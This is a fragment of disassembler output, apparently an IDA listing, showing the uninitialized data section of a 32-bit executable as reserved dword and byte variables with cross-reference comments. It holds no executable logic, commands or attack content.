; .text:004029DD�o ...
dd 18h dup(?)
db ?
dword_41FD41 dd ? ; sub_40289B+6F�r ...
dword_41FD45 dd ? ; sub_4026F2+C8�r ...
byte_41FD49 db 3 dup(?) ; DATA XREF: sub_40289B+67�o
; sub_40289B+92�o
dd 7Fh dup(?)
db ?
dword_41FF49 dd ? ; sub_4026F2+B2�o ...
dword_41FF4D dd ? ; sub_4026F2+BC�o ...
dword_41FF51 dd ? ; sub_40289B+8�w ...
dword_41FF55 dd ? ; sub_402A4C+D1�o
align 4
dd 0Fh dup(?)
db ?
byte_41FF99 db 3 dup(?) ; DATA XREF: sub_402A4C:loc_402B18�o
dd 3 dup(?)
db ?
dword_41FFA9 dd ? ; sub_402BF9+65�r ...
byte_41FFAD db 3 dup(?) ; DATA XREF: sub_402BF9+5E�o
dd 7 dup(?)
db ?
byte_41FFCD db 3 dup(?) ; DATA XREF: sub_402CE7+28�o
; sub_402CE7+B1�o ...
dd 13h dup(?)
db 2 dup(?)
dword_42001E dd ? ; sub_402E17+B9�r ...
align 8
dword_420028 dd ? dd 0Ah dup(?)
dword_420054 dd ? word_420058 dw ? ; DATA XREF: sub_40319C+11C�w start+4C�w
align 4
dd 4 dup(?)
dword_42006C dd ? dword_420070 dd ? dd 2 dup(?)
dword_42007C dd ? dword_420080 dd ? dword_420084 dd 2 dup(?) dword_42008C dd ? ; start:loc_403796�o ...
dd 2Dh dup(?)
dword_420144 dd ? dd 86h dup(?)
dword_420360 dd ? align 8
dword_420368 dd 80h dup(?) dword_420568 dd 31D5h dup(?) dword_42CCBC dd ? ; .text:004033F2�w
dword_42CCC0 dd 100h dup(?) ; .text:004034D1�o ...
dword_42D0C0 dd 100h dup(?) ; sub_40319C+C9�o ...
dword_42D4C0 dd 100h dup(?) ; .text:00403458�o ...
dword_42D8C0 dd ? dword_42D8C4 dd ? ; .text:004034EC�w ...
dd ?
dword_42D8CC dd 82h dup(?) db 2 dup(?)
dword_42DAD6 dd ? ; .text:00403508�w ...
dword_42DADA dd ? ; .text:004034B3�w ...
align 10h
dd ?
db 2 dup(?)
dword_42DAE6 dd ? ; .text:0040353B�r
align 200h
_data ends
end start